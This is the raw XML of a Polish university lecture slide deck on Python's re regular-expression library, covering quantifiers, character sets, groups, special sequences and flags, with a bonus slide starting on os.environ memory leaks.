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301" r:id="rId3"/>
    <p:sldId id="309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10" r:id="rId3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November 22,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38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5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612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8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November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November 22,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#module-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python.org/issue67525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#regular-expression-example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ugs.freebsd.org/bugzilla/show_bug.cgi?id=10341" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=56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frog.com/blog/malicious-pypi-packages-stealing-credit-cards-injecting-cod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98AD51-805D-BDA0-08B4-2808EE9E2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3" y="549275"/>
            <a:ext cx="12344401" cy="1534160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="4800" dirty="0"/>
              <a:t>Programowanie w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="4800" dirty="0" err="1"/>
              <a:t>Pythonie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" sz="4800"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" sz="4800"/>
              <a:t>Biblioteka re </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="4800" dirty="0"/>
              <a:t>+ bonus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DE5DB4-7C6F-C8FE-AADE-83322B537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3022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pl-PL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Łukasz Mioduszewski, UKSW 2022</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 3" descr="Neon — ozdobny okrąg 3W">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D286319-78D2-2CE2-E23C-3259AD47F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14" b="701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244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1ECA16-5142-3BB4-CB67-1ED8C2E3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Znaki specjalne - modyfikatory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E2C1D3-791D-1F8B-B794-1093BEB78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3199"/>
            <a:ext cx="11641138" cy="3979625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'*' gwiazdka – oznacza zero lub więcej powtórzeń wyrażenia które jest bezpośrednio przed gwiazdką, np. 'ab*' pasuje do "a" (zero b), "ab", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>abbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'+' plus – to samo co gwiazdka, tyle że jedno lub więcej ('ab+' nie pasuje do "a")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'?' pytajnik – to samo co gwiazdka, tyle że jedno lub zero ('ab?' tylko do "a", "ab")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'*?', '+?', '??' drugi pytajnik po jednym z tych trzech znaków – oznacza tryb niezachłanny, do wzorca dopasowywany jest jak najwcześniejszy i jak najkrótszy fragment, np. '&lt;.*&gt;' dla stringa "&lt;a&gt; b &lt;c&gt;" zwróci cały string, a '&lt;.*?&gt;' tylko "&lt;a&gt;"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pl-PL" dirty="0"/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198FA0C4-A131-E684-A200-5461B8FAF7C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5248275" y="5768974"/>
            <a:ext cx="0" cy="323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2D408DCD-731B-2179-FA85-1AAA4D144AE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5572125" y="5768974"/>
            <a:ext cx="0" cy="323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6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1ECA16-5142-3BB4-CB67-1ED8C2E3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Znaki specjalne - modyfikatory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E2C1D3-791D-1F8B-B794-1093BEB78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2113199"/>
            <a:ext cx="11763375" cy="3979625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Nowość w wersji 3.11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'*+', '++', '?+' drugi plus po jednym z tych trzech znaków – oznacza tryb bezpowrotny, np. 'a*a' dla stringa "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>aaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>" zwróci "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>aaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>", bo 'a*' najpierw znalazł 4 "a", ale ostatnie 'a' zostało dopasowane do czwartego "a", a 'a*' tylko do 3 "a",</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>za to 'a*+a' nie zwróci nic, bo 'a*' dopasowało się do 4 "a" i nic nie zostało dla 'a'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148677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1ECA16-5142-3BB4-CB67-1ED8C2E3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Znaki specjalne – liczba powtórzeń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E2C1D3-791D-1F8B-B794-1093BEB78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2113199"/>
            <a:ext cx="11763375" cy="4744801"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>{x} liczba w klamerkach – oznacza że poprzedzające wyrażenie musi pasować x razy (np. 'a{4}' działa gdy w stringu są co najmniej 4 "a" obok siebie, nie mniej)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>x,y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>} dwie liczby w klamerkach oddzielone przecinkiem – poprzedzające wyrażenie ma wystąpić od x do y razy (np. 'a{3,5}' od 3 do 5 "a" włącznie)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>domyślnie x wynosi 0, a y nieskończoność (np. {,4} oznacza od 0 do 4, {3,} co najmniej 3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Za klamerkami także można dodać '?' albo '+' aby dopasowywać niezachłannie </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(np. 'a{3,5}?' dla "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>aaaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>" zwróci "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>" zamiast "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>aaaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>") </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>albo bez powrotów (np. 'a{3,5}+aa' nie zadziała dla "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>aaaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>nie można ich łączyć, 'a{3,5}?+aa' to błędne wyrażenie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6491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F9B5AD-CADC-0B48-2C25-05D47248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Znaki specjalne – zestawy znaków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BAEF03-F8A8-5062-D195-C3E9BE700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'[znaki]' znaki w nawiasach kwadratowych – oznacza każdy spośród znaków w nawiasach, np. '[abc]' pasuje zarówno do "a", "b" jak i do "c"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Mogą to być także znaki specjalne, np. '[*]' oznacza po prostu gwiazdkę</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Myślnik wyznacza zakres znaków, chyba że jest na początku lub na końcu, np.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[0-5][0-9]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>wszystkie dwucyfrowe stringi od "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>59</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[0-9A-Fa-f]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>dowolna cyfra w systemie szesnastkowym</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[a\-z]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>' dopasuje się do "a", "-" lub "z"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[-a]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>oraz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[a-]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>' dopasuje się do "a" lub "-"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307760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F9B5AD-CADC-0B48-2C25-05D47248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Znaki specjalne – zestawy znaków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BAEF03-F8A8-5062-D195-C3E9BE700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Jeśli po '[' jest '^', dopasowywane są wszystkie znaki POZA tymi w nawiasach (nie licząc "^"), np. '[^abc]' pasuje do wszystkich znaków poza "a", "b", "c"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'^' ma specjalne znaczenie tylko tuż po '[', np. '[^^]' to wszystko poza "^"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395173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DBD11E-038C-22F6-572E-A9E320D2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Znaki specjalne – łączenie wyrażeń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36CDC3-899F-0C27-B9BB-127A404C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3199"/>
            <a:ext cx="11317287" cy="3979625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'A|B' pionowa kreska – tworzy wyrażenie będące alternatywą wyrażeń A i B (tzn. najpierw sprawdzam A, jeśli nie pasuje to sprawdzam B, i dopiero gdy oba nie pasują wyrażenie 'A|B' nie pasuje), można je łączyć, np. '^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>a|a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>$|b'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'(A)' nawiasy okrągłe – wyrażenie A w nawiasach okrągłych będzie przechowywało wyniki dopasowania w sekwencji \x gdzie x to numer wyrażenia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'(?coś)' pytajnik po nawiasie okrągłym – znaki po pytajniku oznaczają specjalne zasady, patrz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.python.org/3/library/re.html#module-re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1253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DDE42D-46E8-2D63-226C-59D67CB2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Znaki specjalne – łączenie wyrażeń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F6FE2-99C3-552A-500D-F77658D7F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r'\x' gdzie x to liczba od 1 do 99 – oznacza dokładnie to, co zostało dopasowało się do wyrażenia w nawiasach, np. wyrażenie r'(.+) \1' pasuje do "bla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>", "1 1", "128 128", ale już nie "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>abcabc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>" (bo pomiędzy '(.+)' i '\1' jest spacja)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'[\x]' gdzie x to dowolna liczba – oznacza znak o numerze (w systemie ósemkowym) równym x (można używać w notacji [\x-\y], np. r'[\61-\69]'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206248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2056BC-4411-D206-D20C-CB798E5D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Znaki specjalne – inne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AD1BCC-BB8E-8151-E4F9-504793A9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22724"/>
            <a:ext cx="11460163" cy="5497276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'\b' – początek lub koniec słowa, np. r'\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>bfoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>\b' pasuje do "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>foo.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(foo)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>abc", ale już nie do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>ani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>foo3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'\B' – odwrotność \b, pasuje tylko do miejsc gdzie słowo nie zaczyna się ani nie kończy, np.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>r'py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\B' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>pasuje do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>py3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>ale nie do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>" ani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'\w' – określa wszystkie znaki  tworzące słowa, np. "ą", "1", "_"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'\W' – wszystkie znaki nietworzące słów</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'\d' – cyfra </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'\D' – nie cyfra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8029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2056BC-4411-D206-D20C-CB798E5D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Znaki specjalne – inne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AD1BCC-BB8E-8151-E4F9-504793A9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3199"/>
            <a:ext cx="11460163" cy="4744801"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'\s' – biały znak (np. " ")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'\S' – nie biały znak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'\A' – sam początek stringa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>r'\Z' – sam koniec stringa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Ogólna uwaga: jeśli znaki po '\' mają być traktowane "dosłownie" (np. '\b' jako </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>backspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>) najlepiej wsadzić je wewnątrz '[ ]'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8723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A84755-5F9E-CCA3-1011-848800D7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Flagi biblioteki re (domyślnie wyłączone)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621B67-D3EF-13A5-11CF-8B6C13A95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200"/>
            <a:ext cx="11231562" cy="4195526"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>re.ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – znaki specjalne mają być wrażliwe tylko na znaki ASCII </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(po włączeniu r'\w' przestanie rozpoznawać np. "ą")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>odpowiada '(?a)' jeśli chcemy ją ustawić wewnątrz wyrażenia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>re.IGNORECASE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – ignoruj wielkość liter, odpowiada '(?i)'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>re.MULTILINE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – w tym trybie '^' działa tuż po nowej linii, a '$' tuż po końcu linii</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>odpowiada '(?m)'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>re.DOTALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – kropka odpowiada wtedy naprawdę każdemu znakowi. Skrót '(?s)'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247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3BAEA1-2D79-76E0-CD71-9B7C37A1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Uwagi do wycieku pamięci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9D627E-5ED1-708D-3930-9D0046D2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552575"/>
            <a:ext cx="11488737" cy="5305425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>modyfikowanie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>os.environ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>MacOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>FreeBSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> powoduje czasem wycieki pamięci </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
